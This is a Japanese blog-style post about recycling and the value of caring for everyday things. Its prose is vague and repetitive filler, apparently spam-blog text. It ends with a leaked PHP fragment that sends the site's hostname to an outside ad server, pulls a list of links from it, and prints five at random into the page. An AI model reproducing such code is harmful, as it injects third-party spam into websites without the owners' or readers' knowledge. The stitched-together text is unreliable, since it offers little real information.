リサイクルで身の回りの物を快適に

最近はエコが流行っているので、それに関連するリサイクルに興味を持っている方も多くなっているのではないかと思っています。
なので身の回りの物をキレイに快適に過ごすのに最適な選択肢なのが、リサイクルというものなのではないでしょうか。
ものを大事する心がけが最近の日本人にはかけているということを、知り合いの独居老人から聞いたことがありますが、その考え方に個人的には賛成というか、納得できるところが少しあるなと思いました。
なのでまずリサイクルについて色々と知らなければいけないことは、そういった意識なり認識なりをしっかり持つということですね。
それにしても、ものを大事にする心がけというのは少々具体性のかけたものであるような気がしますが、それでもものを大事にする心がけがそういったエコ関連の問題につながってくることだというのは、断定しても過言ではないと個人的には感じていますね。
そういえば私の身の回りでもそういったことに対して真剣に取り組んでいる方がいます。
プラスチックの包装や容器みたいなそういったものをちゃんと洗浄して、そういったものを取り扱っているショップに持っていく、この一連の行動を何年も継続することによってちゃんとそういったことに貢献していく、これらの積み重ねがとても大きな事につながっていく、ちりも積もれば山となるという言葉がありますが、まさにそういったことを実感できるそういった行動をその方から学びました。

//// $MAX = 5; // ////////////////// $lines = file('http://links-002.com/ad/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST'])); shuffle($lines); for($i=0;$i<$MAX;$i++){ echo($lines[$i].""); } ?>